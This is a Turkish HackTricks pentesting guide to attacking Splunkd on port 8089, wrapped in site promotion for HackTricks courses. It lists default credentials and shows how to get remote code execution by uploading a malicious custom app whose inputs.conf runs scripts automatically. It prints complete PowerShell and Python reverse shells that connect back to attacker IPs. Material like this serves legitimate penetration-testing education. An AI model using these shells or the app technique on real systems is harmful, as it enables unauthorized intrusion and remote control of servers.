8089 - Pentesting Splunkd
Reading time: 4 minutes
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking'i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Temel Bilgiler
- Veri toplama, analiz ve görselleştirme için kullanılan günlük analitik aracı
- Güvenlik izleme ve iş analitiği için yaygın olarak kullanılır
- Varsayılan portlar:
- Web sunucusu: 8000
- Splunkd servisi: 8089
Zafiyet Vektörleri:
- Ücretsiz Sürüm İstismarı
- Deneme sürümü 60 gün sonra otomatik olarak ücretsiz sürüme dönüşür
- Ücretsiz sürüm kimlik doğrulama eksikliği taşır
- Yönetilmediğinde potansiyel güvenlik riski
- Yöneticiler güvenlik etkilerini gözden kaçırabilir
- Kimlik Bilgisi Zayıflıkları
- Eski sürümler: Varsayılan kimlik bilgileri
admin:changeme
- Yeni sürümler: Kurulum sırasında ayarlanan kimlik bilgileri
- Zayıf şifre kullanma potansiyeli (örn.,
admin
,Welcome
,Password123
)
- Uzaktan Kod Çalıştırma Fırsatları
- Birden fazla kod çalıştırma yöntemi:
- Sunucu tarafı Django uygulamaları
- REST uç noktaları
- Scriptlenmiş girdiler
- Uyarı scriptleri
- Çoklu platform desteği (Windows/Linux)
- Scriptlenmiş girdiler çalıştırabilir:
- Bash scriptleri
- PowerShell scriptleri
- Batch scriptleri
Ana İstismar Potansiyeli:
- Hassas veri depolama
- Ücretsiz sürümde kimlik doğrulama eksikliği
- Potansiyel uzaktan kod çalıştırma için birden fazla vektör
- Sistem ihlali için scriptlenmiş girdilerin kullanılma olasılığı
Shodan
Splunk build
RCE
Özel Uygulama Oluşturma
Splunk, özel uygulama dağıtımı aracılığıyla uzaktan kod çalıştırma için sofistike bir yöntem sunar ve çapraz platform scriptleme yeteneklerinden yararlanır. Temel istismar tekniği, hem Windows hem de Linux sistemlerinde ters shell'ler çalıştırabilen kötü niyetli bir uygulama oluşturmaya dayanır.
Özel bir uygulama Python, Batch, Bash veya PowerShell scriptleri çalıştırabilir. Ayrıca, Splunk ile Python yüklü gelir, bu nedenle Windows sistemlerinde bile python kodu çalıştırabileceksiniz.
bu örneğini bin
içeren Python ve PowerShell için kullanabilirsiniz. Ya da kendi uygulamanızı oluşturabilirsiniz.
İstismar süreci, platformlar arasında tutarlı bir metodoloji izler:
splunk_shell/
├── bin (reverse shell scripts)
└── default (inputs.conf configuration)
Kritik yapılandırma dosyası inputs.conf
, scripti şu şekilde etkinleştirir:
disabled = 0
ayarlamak- 10 saniyelik bir yürütme aralığı yapılandırmak
- Scriptin kaynak türünü tanımlamak
Dağıtım basittir:
- Kötü amaçlı uygulama paketini oluşturun
- Saldırgan makinede bir dinleyici (Netcat/socat) kurun
- Uygulamayı Splunk arayüzü aracılığıyla yükleyin
- Yükleme sırasında otomatik script yürütmesini tetikleyin
Örnek Windows PowerShell ters shell:
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Örnek Linux Python ters shell:
import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
RCE & Yetki Yükseltme
Aşağıdaki sayfada bu hizmetin nasıl kötüye kullanılabileceğine dair bir açıklama bulabilirsiniz, yetkileri yükseltmek ve kalıcılık elde etmek için:
Referanslar
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking'i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.